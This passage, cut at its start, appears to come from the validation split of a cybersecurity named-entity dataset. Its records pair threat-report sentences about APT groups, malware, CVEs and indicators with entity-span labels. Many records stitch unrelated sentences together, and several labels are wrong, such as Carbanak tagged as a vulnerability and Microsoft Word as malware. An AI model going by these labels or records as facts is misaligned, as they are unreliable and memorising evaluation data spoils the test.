We were able to find additional links between Hack520 ’s “ Pig network ” and the Winnti group ’s activities .", "spans": {"Malware: FinFisher": [[123, 132]], "Organization: social media": [[179, 191]], "Organization: employees": [[222, 231]], "System: Pig network": [[434, 445]]}, "info": {"id": "cyberner_stix_valid_000484", "source": "cyberner_stix_valid"}} {"text": "Moreover , eSurv was a business unit of Connexxa and was leased to eSurv S.R.L in 2014 . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . MuddyWater is a relatively new APT that surfaced in 2017 .", "spans": {"Organization: eSurv": [[11, 16]], "Organization: Connexxa": [[40, 48]], "Organization: eSurv S.R.L": [[67, 78]], "Organization: CSIS": [[139, 143]], "Vulnerability: Carbanak": [[177, 185]], "Organization: customers": [[215, 224]]}, "info": {"id": "cyberner_stix_valid_000485", "source": "cyberner_stix_valid"}} {"text": "Similarly , GeminiDuke may also download image files , but these would contain embedded additional configuration information for the toolset itself .", "spans": {"Malware: GeminiDuke": [[12, 22]]}, "info": {"id": "cyberner_stix_valid_000486", "source": "cyberner_stix_valid"}} {"text": "Next to the features , we expect the target list to be expanded to contain additional ( banking ) apps in the near future . In addition to their preexist backdoor , ServHelper and FlawedAmmy , they have also been confirmed to use the backdoor called AdroMut and FlowerPippi . 
While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"Organization: Secureworks": [[315, 326]], "Vulnerability: CVE-2016-7836": [[438, 451]]}, "info": {"id": "cyberner_stix_valid_000487", "source": "cyberner_stix_valid"}} {"text": "In such situations , mobile users should always take the utmost precautions while downloading any applications from the internet . Hussarini was first mentioned in APT campaigns targeting the Philippines and Thailand in 2014 . APT18 is a threat group that has operated since at least 2009 and has targeted a range of industries , including , manufacturing , human rights , government , and .", "spans": {}, "info": {"id": "cyberner_stix_valid_000488", "source": "cyberner_stix_valid"}} {"text": "During our analysis , Downeks created a file in “ Appdata\\Roaming ” containing only “ SD{new line} 0 ” ( “ SD ” possibly for “ SharpDownloader ” ) .", "spans": {"Malware: Downeks": [[22, 29]]}, "info": {"id": "cyberner_stix_valid_000489", "source": "cyberner_stix_valid"}} {"text": "Older attacks involved a self-extracting archive with a suggestive name , for example : “ Human right report of north Africa under the war . scr ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000490", "source": "cyberner_stix_valid"}} {"text": "Based upon Cylance 's observations , the Tofu Backdoor was deployed in far fewer instances than the Ham Backdoor . 
The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"Organization: Cylance": [[11, 18]], "Indicator: XLS files": [[175, 184]], "Organization: employees working in the banking sector": [[188, 227]]}, "info": {"id": "cyberner_stix_valid_000491", "source": "cyberner_stix_valid"}} {"text": "We believe these timestamps to be generated during the compilation of GeminiDuke from the local time of the computer being used .", "spans": {"Malware: GeminiDuke": [[70, 80]]}, "info": {"id": "cyberner_stix_valid_000492", "source": "cyberner_stix_valid"}} {"text": "It was originally documented on July 25 , 2014 ( or June 22 , 2014 , according to Kaspersky ) and the first campaign we observed in which TA505 distributed Dridex occurred three days later on July 28 .", "spans": {"Organization: Kaspersky": [[82, 91]], "Malware: Dridex": [[156, 162]]}, "info": {"id": "cyberner_stix_valid_000493", "source": "cyberner_stix_valid"}} {"text": "Types of attacks possibly averted include Structured Query Language ( SQL ) injection , cross-site scripting , and command injection .", "spans": {}, "info": {"id": "cyberner_stix_valid_000494", "source": "cyberner_stix_valid"}} {"text": "A few months later , in February 2017 , the FBI published a press release revising its estimates and stating that \" Since January 2015 , there has been a 1,300 percent increase in identified exposed losses , now totaling over $3 billion \" Recognizing the significance of this threat group , Unit 42 continues to track the evolution of Nigerian cybercrime under the code name SilverTerrier . 
In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": {"Organization: FBI": [[44, 47]], "Organization: Unit 42": [[291, 298]], "Organization: Symantec": [[406, 414]], "Organization: customers": [[517, 526]]}, "info": {"id": "cyberner_stix_valid_000495", "source": "cyberner_stix_valid"}} {"text": "This is done both by requesting admin privileges on the device and asking the user to allow the application to access the device 's settings . Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 . Certain details , such as using the same infrastructure and targeting , make us believe that Operation Daybreak is being done by the ScarCruft APT group .", "spans": {}, "info": {"id": "cyberner_stix_valid_000496", "source": "cyberner_stix_valid"}} {"text": "At the beginning of August , Sofacy began a new wave of attacks , focusing on defense-related targets .", "spans": {}, "info": {"id": "cyberner_stix_valid_000497", "source": "cyberner_stix_valid"}} {"text": "The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . Now GozNym is now targeting 13 banks and subsidiaries in Germany , Limor Kessem , Executive Security Advisor at IBM , said Tuesday .", "spans": {"Organization: financial": [[61, 70]], "Organization: economic": [[73, 81]], "Organization: trade policy": [[86, 98]], "Malware: GozNym": [[202, 208]], "Organization: banks": [[229, 234]], "Organization: subsidiaries": [[239, 251]], "Organization: Kessem": [[271, 277]], "Organization: Executive Security": [[280, 298]], "Organization: IBM": [[310, 313]]}, "info": {"id": "cyberner_stix_valid_000498", "source": "cyberner_stix_valid"}} {"text": "Presumably , this was done to make the app seem more credible to targeted users in different countries . 
This includes Python scripts . Mandiant has previously observed targeted attackers stealing email , but few threat actors have been as successful at this as APT35 .", "spans": {"Organization: Mandiant": [[136, 144]]}, "info": {"id": "cyberner_stix_valid_000499", "source": "cyberner_stix_valid"}} {"text": "Cybereason Mobile Detecting EventBotCybereason Mobile detecting EventBot . Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . This Trojan is related to the Elise backdoor described in the Operation Lotus Blossom report .", "spans": {"Organization: Cybereason Mobile": [[0, 17]], "Malware: EventBot": [[64, 72]], "Malware: attachment": [[110, 120]], "Malware: DLL side-loading": [[174, 190]], "Malware: Trojan": [[215, 221]], "Malware: Elise backdoor": [[240, 254]]}, "info": {"id": "cyberner_stix_valid_000500", "source": "cyberner_stix_valid"}} {"text": "The group was also responsible for the 2016 attack on the World Anti Doping Agency ( WADA ) and the leaking of confidential drug testing information .", "spans": {"Organization: World Anti Doping Agency": [[58, 82]], "Organization: WADA": [[85, 89]]}, "info": {"id": "cyberner_stix_valid_000501", "source": "cyberner_stix_valid"}} {"text": "In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . 
The group 's main objective is to steal source codes .", "spans": {"Vulnerability: Microsoft Office vulnerability": [[53, 83]], "Vulnerability: CVE-2017-11882": [[84, 98]]}, "info": {"id": "cyberner_stix_valid_000502", "source": "cyberner_stix_valid"}} {"text": "Upon execution , KASPERAGENT drops the payload and a decoy document that displays Arabic names and ID numbers .", "spans": {"Malware: KASPERAGENT": [[17, 28]]}, "info": {"id": "cyberner_stix_valid_000503", "source": "cyberner_stix_valid"}} {"text": "EventBot Dropped XML configuration files Dropped XML configuration files on the device . Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionnaires . Ties to SHAPESHIFT suggest that APT33 may engage in destructive operations or shares tools or development resources with an Iranian threat group that conducts destructive operations .", "spans": {"Malware: EventBot": [[0, 8]], "Malware: Margarita": [[122, 131]], "Malware: SHAPESHIFT": [[259, 269]]}, "info": {"id": "cyberner_stix_valid_000504", "source": "cyberner_stix_valid"}} {"text": "VOODOO BEAR is a highly advanced adversary with a suspected nexus to the Russian Federation . 
Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February .", "spans": {"Malware: GandCrab": [[137, 145]], "Organization: customers": [[186, 195]], "Organization: IT support firms": [[206, 222]]}, "info": {"id": "cyberner_stix_valid_000505", "source": "cyberner_stix_valid"}} {"text": "It is possible to decompile the deobfuscated sample and retrieve most of the original source code but not enough to compile it easily .", "spans": {}, "info": {"id": "cyberner_stix_valid_000506", "source": "cyberner_stix_valid"}} {"text": "On 27th February , Kaspersky and CrySyS Lab published research on this previously unidentified malware family , dubbing it MiniDuke .", "spans": {"Organization: Kaspersky": [[19, 28]], "Organization: CrySyS Lab": [[33, 43]], "Malware: MiniDuke": [[123, 131]]}, "info": {"id": "cyberner_stix_valid_000507", "source": "cyberner_stix_valid"}} {"text": "The multiple vulnerabilities in these older systems provide cyber actors many targets for exploitation .", "spans": {}, "info": {"id": "cyberner_stix_valid_000508", "source": "cyberner_stix_valid"}} {"text": "Step 1 : Download Bank Austria Security App Download the Bank Austria security app to your Android device . Sea Turtle have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . 
APT33 Elfin APT33 is a suspected Iranian threat group that has carried out operations since at least 2013 .", "spans": {"System: Bank Austria Security App": [[18, 43]], "Organization: DNS registries": [[172, 186]], "Organization: number of registrars": [[193, 213]]}, "info": {"id": "cyberner_stix_valid_000509", "source": "cyberner_stix_valid"}} {"text": "As a result of the long-term development process , there are multiple , exceptional capabilities : usage of multiple exploits for gaining root privileges , a complex payload structure , never-before-seen surveillance features such as recording surrounding audio in specified locations . To learn more about this campaign , you may refer to our report , Operation Pawn Storm Using Decoys to Evade Detection . The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets .", "spans": {"Malware: LOWBALL": [[412, 419]], "Malware: BUBBLEWRAP": [[514, 524]]}, "info": {"id": "cyberner_stix_valid_000510", "source": "cyberner_stix_valid"}} {"text": "In doing so , users can mistakenly install malicious apps , such as the spyware mentioned in this blog . Xagent – A variant of JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms . Group5 has used two commonly available remote access tools ( RATs ) , njRAT S-MAL and NanoCore , as well as an Android RAT , DroidJack .", "spans": {"Malware: remote access tools": [[287, 306]], "Malware: RATs": [[309, 313]], "Malware: , njRAT S-MAL and NanoCore": [[316, 342]], "Malware: Android RAT": [[359, 370]], "Malware: DroidJack": [[373, 382]]}, "info": {"id": "cyberner_stix_valid_000511", "source": "cyberner_stix_valid"}} {"text": "Trend Micro detects these as ANDROIDOS_XLOADER.HRX . 
The heavier targeting in Pakistan adheres to historical targeting and the ongoing tension between the two countries , which has escalated since a terrorist attack in Kashmir on 14 February 2019 . Once the macro is executed , the malware downloads two files from “ kentona[.su ” , using an SSL encrypted communication , and stores them in “ C:\\Users\\Public ” path : “ rtegre.exe ” and “ wprgxyeqd79.exe ” .", "spans": {"Organization: Trend Micro": [[0, 11]], "Indicator: kentona[.su": [[317, 328]], "Indicator: rtegre.exe": [[420, 430]], "Indicator: wprgxyeqd79.exe": [[439, 454]]}, "info": {"id": "cyberner_stix_valid_000512", "source": "cyberner_stix_valid"}} {"text": "Payment card dumps are commonly shared amongst Brazilian threat actors via social media forums such as Facebook , Skype , and web-based WhatsApp messenger . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"Organization: social media forums": [[75, 94]], "Organization: CrowdStrike": [[245, 256]], "Organization: dissidents": [[311, 321]]}, "info": {"id": "cyberner_stix_valid_000513", "source": "cyberner_stix_valid"}} {"text": "This sample is clearly a mix between the two . Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands . The changes to RIPTIDE were significant enough to circumvent existing RIPTIDE detection rules . 
RedLeaves can use HTTP over non - standard ports , such as 995 , for C2.Rocke 's miner connects to a C2 server using port 51640.[32 ]", "spans": {"Malware: RIPTIDE": [[181, 188], [236, 243]], "Malware: RedLeaves": [[262, 271]], "System: C2 server": [[363, 372]]}, "info": {"id": "cyberner_stix_valid_000514", "source": "cyberner_stix_valid"}} {"text": "Recently , Sophos Labs has observed criminal groups scanning the internet for open MySQL databases running on Windows systems , which they tried to infect with GandCrab . The server used to host these malware samples was located on the German provider Hetzner ( 148.251.55.114 ) , within a small block of IP addresses that are registered with the customer ID \" HOS-156205 \" .", "spans": {"Organization: Sophos Labs": [[11, 22]], "Organization: provider": [[243, 251]]}, "info": {"id": "cyberner_stix_valid_000515", "source": "cyberner_stix_valid"}} {"text": "If an incoming SMS contains one of the following magic strings : ” 2736428734″ or ” 7238742800″ the malware will execute multiple initial commands : Keylogger implementation Keylogging is implemented in an original manner . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) . APT33 : c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b S-SHA2 AutoIt FTP tool . 
Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": {"Malware: 32-bit Windows executable file": [[269, 299]], "Malware: c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b S-SHA2 AutoIt FTP": [[357, 439]]}, "info": {"id": "cyberner_stix_valid_000516", "source": "cyberner_stix_valid"}} {"text": "Actor : The attacker organization ; real humans driven by various motivations -- In the case of TA505 , the motivations are financial .", "spans": {}, "info": {"id": "cyberner_stix_valid_000517", "source": "cyberner_stix_valid"}} {"text": "Split Strings Encrypted strings can be a signal that the code is trying to hide something . The group subsequently stole communications related to the firm 's business relationship with a national military , including inventories and memoranda about specific products they provided . GetCMD Remote Shell . June also witnessed a staggering increase in attacks from relatively new gangs such as Akira ( 26 ) and 8Base ( 41 ) , enough to propel both of them into the top five — a designation usually reserved for more familiar names like ALPHV , who was conspicuously silent in June .", "spans": {"Organization: communications": [[121, 135]], "Organization: military": [[197, 205]]}, "info": {"id": "cyberner_stix_valid_000518", "source": "cyberner_stix_valid"}} {"text": "These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures . 
While we did not discuss the surrounding attacks using Bookworm in detail , we have observed threat actors deploying Bookworm primarily in attacks on targets in Thailand .", "spans": {"Malware: Bookworm": [[262, 270], [324, 332]]}, "info": {"id": "cyberner_stix_valid_000519", "source": "cyberner_stix_valid"}} {"text": "Port 6210 : SBrowser extraction service . The threat then executes \" svchost.exe \" . Potentially fake , leaked Hamas documents . \" These [ Rising Sun ] implants were all based on the original Backdoor Duuzer source code , \" the researchers say in their report .", "spans": {"System: SBrowser": [[12, 20]], "Malware: Backdoor Duuzer source code": [[192, 219]]}, "info": {"id": "cyberner_stix_valid_000520", "source": "cyberner_stix_valid"}} {"text": "Registering broadcast receivers enable XLoader to trigger its malicious routines . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . It has a structure similar to previous “ wprgxyeqd79.exe ” file : two of their files have the same name , but the content of this new SFX is extracted in the “ %ALLUSERSPROFILE%\\Windows Anytime Upgrade ” directory .", "spans": {"Malware: XLoader": [[39, 46]], "Malware: wuaupdt.exe": [[83, 94]], "Indicator: wprgxyeqd79.exe": [[214, 229]], "System: %ALLUSERSPROFILE%\\Windows": [[333, 358]]}, "info": {"id": "cyberner_stix_valid_000521", "source": "cyberner_stix_valid"}} {"text": "Sometimes , we can attribute different apps to the same author based on a small , unique pieces of evidence that suggest similarity , such as a repetition of an exceptionally rare code snippet , asset , or a particular string in the debug logs . MoneyTaker uses ' fileless ' malware only existing in RAM and is destroyed after reboot . The encoded payload is written to a temporary file , decoded and executed in a hidden window . 
• Use of additional offensive security tools Covenant , Nishang , and PowerCat for remote access .", "spans": {}, "info": {"id": "cyberner_stix_valid_000522", "source": "cyberner_stix_valid"}} {"text": "As it launches , it requests device administrator rights , and then starts communicating with its C & C server . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . It 's possible that Lazarus is using RATANKBA to target larger organizations .", "spans": {"Vulnerability: Java zero-day vulnerability": [[143, 170]], "Vulnerability: CVE-2012-4681": [[173, 186]], "Malware: Microsoft Word": [[232, 246]], "Vulnerability: CVE-2010-3333": [[249, 262]], "Vulnerability: CVE-2010-2883": [[288, 301]], "Malware: RATANKBA": [[343, 351]]}, "info": {"id": "cyberner_stix_valid_000523", "source": "cyberner_stix_valid"}} {"text": "What makes this malware extremely powerful is the capability to adapt after it 's deployed . This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT . APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups .", "spans": {"Organization: government agencies": [[185, 204]], "Organization: 360-CERT": [[262, 270]]}, "info": {"id": "cyberner_stix_valid_000524", "source": "cyberner_stix_valid"}} {"text": "It is likely that BRONZE PRESIDENT has additional unobserved operational tools and capabilities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000525", "source": "cyberner_stix_valid"}} {"text": "CTU researchers assess with moderate confidence that APT28 is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government . 
Since we published our last report on SLUB , the backdoor has been updated and several improvements were implemented . The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . During this attack , we found that the SLUB malware used two Slack teams sales-yww9809” and marketing-pwx7789 . SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments . In April 2018 , SWEED began making use of a previously disclosed Office exploit . In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . We found them targeting countries in the Middle East such as United Arab Emirates and Saudi Arabia , as well as other countries such as India , Japan , Argentina , the Philippines , and South Korea . Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . 
Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework .", "spans": {"Organization: CTU": [[0, 3]], "Organization: Russian government": [[147, 165]], "Malware: backdoor": [[217, 225]], "Vulnerability: CVE-2018-8174": [[386, 399]], "Vulnerability: CVE-2019-0752": [[403, 416]], "Vulnerability: exploit": [[726, 733], [1385, 1392]], "Organization: Microsoft": [[827, 836], [893, 902]], "Vulnerability: CVE-2017-11882": [[845, 859]], "Indicator: JAR": [[1252, 1255]], "Malware: Order_2018.jar": [[1316, 1330]], "Indicator: slides": [[1366, 1372]], "Vulnerability: CVE-2017-8759": [[1397, 1410]]}, "info": {"id": "cyberner_stix_valid_000526", "source": "cyberner_stix_valid"}} {"text": "Security solutions can detect it in countless combinations with other suspicious permissions and functions , or malicious functionalities – but when faced with no additional functionality nor permission , all failed to trigger any alarm on DEFENSOR ID . This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro’s Zero Day Initiative (ZDI) that was just patched this April . While the tools profiled in this report are not inherently malicious , their capabilities are nonetheless integral to the Lazarus Group 's cyber operations , both espionage and destructive in nature , making them inherently dangerous to potential victims .", "spans": {"Malware: DEFENSOR ID": [[240, 251]], "Vulnerability: CVE-2019-0752": [[279, 292]], "Organization: Trend Micro’s": [[344, 357]]}, "info": {"id": "cyberner_stix_valid_000527", "source": "cyberner_stix_valid"}} {"text": "For example , this could be when the victim ’ s device connects to a Wi-Fi access point that is infected or controlled by the attackers . Japan is no stranger to banking malware . 
Multiple China-based cyber threat groups have targeted international media organizations in the past .", "spans": {"Malware: banking": [[162, 169]], "Malware: malware": [[170, 177]], "Organization: international media organizations": [[235, 268]]}, "info": {"id": "cyberner_stix_valid_000528", "source": "cyberner_stix_valid"}} {"text": "Known for hijacking prominent social media accounts , the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network . The APT group is reportedly targeting the Middle East region .", "spans": {"Organization: social media": [[30, 42]], "Organization: Twitter": [[133, 140]], "Organization: Facebook": [[145, 153]]}, "info": {"id": "cyberner_stix_valid_000529", "source": "cyberner_stix_valid"}} {"text": "The Rancor group 's attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server .", "spans": {"Indicator: China Chopper": [[148, 161]], "Vulnerability: exploit": [[223, 230], [254, 261]], "System: Windows": [[266, 273]], "Vulnerability: CVE-2015-0062": [[290, 303]], "Vulnerability: CVE-2015-1701": [[306, 319]], "Vulnerability: CVE-2016-0099": [[324, 337]]}, "info": {"id": "cyberner_stix_valid_000530", "source": "cyberner_stix_valid"}} {"text": "Our research team has found infected apps on third-party app stores , but they could also be downloaded by Android users directly by tapping malicious links in phishing attack messages . APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol ( RDP ) , Secure Shell ( SSH ) , PsExec , RemCom , and xCmdSvc . 
There are some variants with this pattern ( e.g , the variable – 10 < 0 ) Given that threat actors use red team tools and public exploitation frameworks for targeted threat activity in the wild , we believe COSMICENERGY poses a plausible threat to affected electric grid assets .", "spans": {"System: Android": [[107, 114]], "Malware: COSMICENERGY": [[547, 559]], "System: electric grid assets": [[597, 617]]}, "info": {"id": "cyberner_stix_valid_000531", "source": "cyberner_stix_valid"}} {"text": "When this HTTP request completes , the event listener will call the ‘ onload2 ’ function .", "spans": {}, "info": {"id": "cyberner_stix_valid_000532", "source": "cyberner_stix_valid"}} {"text": "Therefore , we believe that the same threat group is behind both intrusions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000533", "source": "cyberner_stix_valid"}} {"text": "The Curious Case of Notepad and Chthonic : Exposing a Malicious Infrastructure .", "spans": {"Malware: Chthonic": [[32, 40]]}, "info": {"id": "cyberner_stix_valid_000534", "source": "cyberner_stix_valid"}} {"text": "If the user has launched Play Market , the Trojan intercepts the event and displays a window on top of the Google Play window , prompting the user to enter his/her bank card details in the fake window . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including education . These tools are used to further compromise the organization by attacking other hosts inside the targets network . 
Furthermore , these reports indicated that Zarya was cooperating with or being handled by officers of Russia ’s Federal Security Service ( FSB ) .", "spans": {"System: Play Market": [[25, 36]], "System: Google Play": [[107, 118]], "Organization: education": [[313, 322]], "Organization: Russia ’s Federal Security Service ( FSB )": [[541, 583]]}, "info": {"id": "cyberner_stix_valid_000535", "source": "cyberner_stix_valid"}} {"text": "This new organization seems to work on securing Android devices . The following examples were developed using a Winnti installer that was used in attacks in December 2016 . In most cases , the attacks involved Adobe Acrobat , Reader , and Flash Player exploits such as : CVE-2009-4324 , CVE-2009-0927 , CVE-2011-0609 , CVE-2011-0611 . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": {"Organization: Android": [[48, 55]], "Vulnerability: CVE-2009-4324": [[271, 284]], "Vulnerability: CVE-2009-0927": [[287, 300]], "Vulnerability: CVE-2011-0609": [[303, 316]], "Vulnerability: CVE-2011-0611": [[319, 332]], "Organization: RussianPanda": [[335, 347]], "Malware: RogueRaticate": [[393, 406]]}, "info": {"id": "cyberner_stix_valid_000536", "source": "cyberner_stix_valid"}} {"text": "The updated tool has only been seen in a handful of victim computers within organizational networks in Southeast Asia—PLATINUM is known to customize tools based on the network architecture of targeted organizations . At this point , the current attack campaign against the chemical industry began .", "spans": {"Organization: chemical industry": [[273, 290]]}, "info": {"id": "cyberner_stix_valid_000537", "source": "cyberner_stix_valid"}} {"text": "Based on our observations , this group uses a variety of different methods to either compromise or acquire already compromised payment card credentials . 
The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"Organization: CrowdStrike": [[309, 320]], "Organization: dissidents": [[375, 385]]}, "info": {"id": "cyberner_stix_valid_000538", "source": "cyberner_stix_valid"}} {"text": "The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . In April , shortly after the Trojan 's discovery , researchers observed a massive GozNym campaign targeting 24 North American banks .", "spans": {"Organization: governments": [[97, 108]], "Malware: Trojan": [[230, 236]], "Organization: banks": [[327, 332]]}, "info": {"id": "cyberner_stix_valid_000539", "source": "cyberner_stix_valid"}} {"text": "After receiving the rights , it sets itself as the default SMS app and disappears from the device screen . CTU researchers have observed TG-3390 activity between 04:00 and 09:00 UTC , which is 12:00 to 17:00 local time in China ( UTC +8 ) . It then resets cron and removes possible cache files from other programs , starts scripts and binaries a , init0 , and start , and sets the persistence by modifying the crontab . 
CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": {"Organization: CTU": [[107, 110]], "Indicator: a": [[344, 345]], "Indicator: init0": [[348, 353]], "Organization: CrowdStrike Services": [[420, 440]], "Vulnerability: CVE-2022 - 41040": [[601, 617]], "Vulnerability: CVE-2022 - 41082": [[622, 638]]}, "info": {"id": "cyberner_stix_valid_000540", "source": "cyberner_stix_valid"}} {"text": "Coralco Tech 's services description . Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file . Once decoded , this blob reveals a standardized structure of the information sent to the registered C&C server , which includes the following details : Computer name , Local IP address , Proxy server IP and port , Malware ID . It is therefore recommended to set the code only as a response for or methods and to use instead , as the method change is explicitly prohibited in that case .", "spans": {}, "info": {"id": "cyberner_stix_valid_000541", "source": "cyberner_stix_valid"}} {"text": "The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe . 
TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": {"Vulnerability: CVE2017-11882": [[27, 40]], "Malware: HTA": [[90, 93]], "Malware: mshta.exe": [[223, 232]], "Organization: CTU": [[291, 294]], "Vulnerability: zero-day": [[349, 357]]}, "info": {"id": "cyberner_stix_valid_000542", "source": "cyberner_stix_valid"}} {"text": "TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country .", "spans": {"Organization: technology": [[163, 173]], "Organization: industrial": [[176, 186]], "Organization: manufacturing": [[189, 202]], "Organization: human rights groups": [[205, 224]], "Organization: government": [[227, 237]], "Organization: pharmaceutical": [[240, 254]], "Organization: medical technology": [[261, 279]], "Malware: GozNym": [[304, 310]], "Organization: banks": [[354, 359]], "Organization: community banks": [[451, 466]], "Organization: email service providers": [[471, 494]]}, "info": {"id": "cyberner_stix_valid_000543", "source": "cyberner_stix_valid"}} {"text": "Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . 
Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": {"Organization: FireEye": [[10, 17]], "Malware: VALUEVAULT": [[89, 99]], "Malware: LONGWATCH": [[104, 113]], "Vulnerability: exploit": [[121, 128]], "Malware: Nidiran": [[149, 156]], "Malware: self-extracting executable": [[180, 206]], "Indicator: .tmp": [[241, 245]]}, "info": {"id": "cyberner_stix_valid_000544", "source": "cyberner_stix_valid"}} {"text": "Apart from injecting code to read the CAPTCHA , the app also injects its own code into the system_server process , which requires root privileges . The Sogu gang use a custom developed threat – Backdoor.Sogu , whereas the group described in this document use an off the shelf threat – Poison Ivy . APT17 , also known as DeputyDog , is a Chinabased threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations . To compromise the victims , the attackers used extremely effective social engineering techniques which involved sending malicious PDF documents to their targets .", "spans": {"Organization: FireEye": [[366, 373]]}, "info": {"id": "cyberner_stix_valid_000545", "source": "cyberner_stix_valid"}} {"text": "] it Firenze serverrt.exodus.connexxa [ . Furthermore , Dragos' analysis of the TRISIS event continues as we recover additional data surrounding the incident . This command is used to upload collected data to the C2 server . 
By creating awareness and using the right solutions , both individuals and organizations can take the steps needed to defend against the malicious tactics used by threat actors like the Winnti group .", "spans": {"Organization: Dragos'": [[56, 63]]}, "info": {"id": "cyberner_stix_valid_000546", "source": "cyberner_stix_valid"}} {"text": "These new tactics of selectively targeting organizations for high ransomware payouts have signaled a shift in INDRIK SPIDER 's operation with a new focus on targeted , low-volume , high-return criminal activity : a type of cybercrime operation we refer to as big game hunting . ScarCruft infected this victim on September 21 , 2018 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000547", "source": "cyberner_stix_valid"}} {"text": "The malware searches both internal and external storage and encrypts them using RC4 . Wild Neutron hit the spotlight in 2013 , when it successfully infected companies such as Apple , Facebook , Twitter and Microsoft . ScarCruft continues to evolve, introduces Bluetooth harvester . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": {"Organization: Apple": [[175, 180]], "Organization: Facebook": [[183, 191]], "Organization: Twitter": [[194, 201]], "Organization: Microsoft": [[206, 215]], "System: WordPress sites": [[347, 362]], "System: WebDav server": [[396, 409]]}, "info": {"id": "cyberner_stix_valid_000548", "source": "cyberner_stix_valid"}} {"text": "We ’ ve noticed an increase in the number of attacks using this event as a lure . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . 
